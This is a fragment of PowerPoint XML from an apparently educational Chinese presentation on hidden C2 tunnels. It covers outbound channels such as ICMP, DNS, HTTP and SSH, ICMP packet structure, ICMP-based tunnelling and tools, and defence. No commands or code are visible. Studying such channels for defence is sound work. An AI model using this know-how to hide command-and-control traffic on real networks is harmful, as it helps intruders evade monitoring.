                <a:rPr kumimoji="1"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隧道、</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US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UDP</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1"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隧道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81831CE-550D-4049-9017-4FF46F07264C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5727404" y="2057027"/>
              <a:ext cx="3130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HTTP</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1"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DNS</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1"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</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN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SSH</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US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等隧道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05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C2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>隧道的概念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/>
              <a:t>内网主机所有可能的出网、入网方式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、允许</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>协议出网、入网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、允许特定的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>协议端口出网、入网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3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、允许特定的应用层协议出网、入网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917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B0257-535B-4FAD-8B88-B28BFD3B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6D6077-A2E5-744B-9287-2BCBB482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0" t="26332" r="5090" b="6717"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2055950" y="1130157"/>
            <a:ext cx="5032100" cy="31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7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协议工作方式简介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GB" altLang="zh-CN" dirty="0">
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-GB" dirty="0">
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t>InternetControl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="zh-CN" dirty="0">
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="zh-CN" dirty="0" err="1">
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t>MessageProtocol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-GB" dirty="0">
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t>是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="zh-CN" b="1" dirty="0">
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t>Internet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t>控制报文协议</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1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它是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="zh-CN" dirty="0">
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t>TCP/IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t>协议簇的一个子协议，用于在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="zh-CN" dirty="0">
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t>主机、路由器之间</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t>传递控制消息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1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网络层</a:t>
            </a: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pPr marL="254250">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
            </a:endParaRPr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zh-CN" dirty="0"/>
              <a:t>网络探测与回馈机制 </a:t>
            </a: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92642A09-C786-BC45-AAF5-CF50AEAD8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921" y="2245409"/>
            <a:ext cx="3750157" cy="19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7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协议工作方式简介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en-GB" altLang="zh-CN" dirty="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>帧格式如下所示：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EAD3FA-4039-F941-A024-D1CF6BC0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53" y="2207600"/>
            <a:ext cx="5465101" cy="190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42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E56BA-65D6-4865-9C4B-7AD03D8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ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>C2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>隧道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74423-8A6E-41CB-9F35-4233F193F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242" y="1025925"/>
            <a:ext cx="8335925" cy="21354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ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>协议工作方式简介</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="540000" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc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lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t>其中，类型和代码字段决定了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="zh-CN" dirty="0">
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
              </a:rPr>
              <a:t>报文的类型，如下图所示</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202090204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:cs typeface="Microsoft YaHei Light" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-C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308513-6312-7B47-9B79-821CA6C4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991" y="1907133"/>
            <a:ext cx="6107517" cy="25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4133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1353</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>全屏显示(16:9)</PresentationFormat>
  <Paragraphs>144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方正兰亭特黑简体</vt:lpstr>
      <vt:lpstr>Microsoft YaHei</vt:lpstr>
      <vt:lpstr>Microsoft YaHei</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>主题1</vt:lpstr>
      <vt:lpstr>隐藏的c2隧道</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>C2隧道的概念</vt:lpstr>
      <vt:lpstr>C2隧道的概念</vt:lpstr>
      <vt:lpstr>C2隧道的概念</vt:lpstr>
      <vt:lpstr>基于ICMP的C2隧道</vt:lpstr>
      <vt:lpstr>基于ICMP的C2隧道</vt:lpstr>
      <vt:lpstr>基于ICMP的C2隧道</vt:lpstr>
      <vt:lpstr>基于ICMP的C2隧道</vt:lpstr>
      <vt:lpstr>基于ICMP的C2隧道</vt:lpstr>
      <vt:lpstr>基于ICMP的C2隧道</vt:lpstr>
      <vt:lpstr>基于ICMP的C2隧道</vt:lpstr>
      <vt:lpstr>基于ICMP的C2隧道</vt:lpstr>
      <vt:lpstr>基于ICMP的C2隧道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ICMP隧道工具</vt:lpstr>
      <vt:lpstr>防御</vt:lpstr>
      <vt:lpstr>防御</vt:lpstr>
      <vt:lpstr>完结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PPT演示内容编写标准规范</dc:title>
  <dc:creator>Senga</dc:creator>
  <cp:lastModifiedBy>A2441</cp:lastModifiedBy>
  <cp:revision>253</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-03-09T02:51:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-01-06T12:57:13Z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C336CD48216B4554AB31C43428E6BB5C</vt:lpwstr>
  </property>
</Properties>
</file>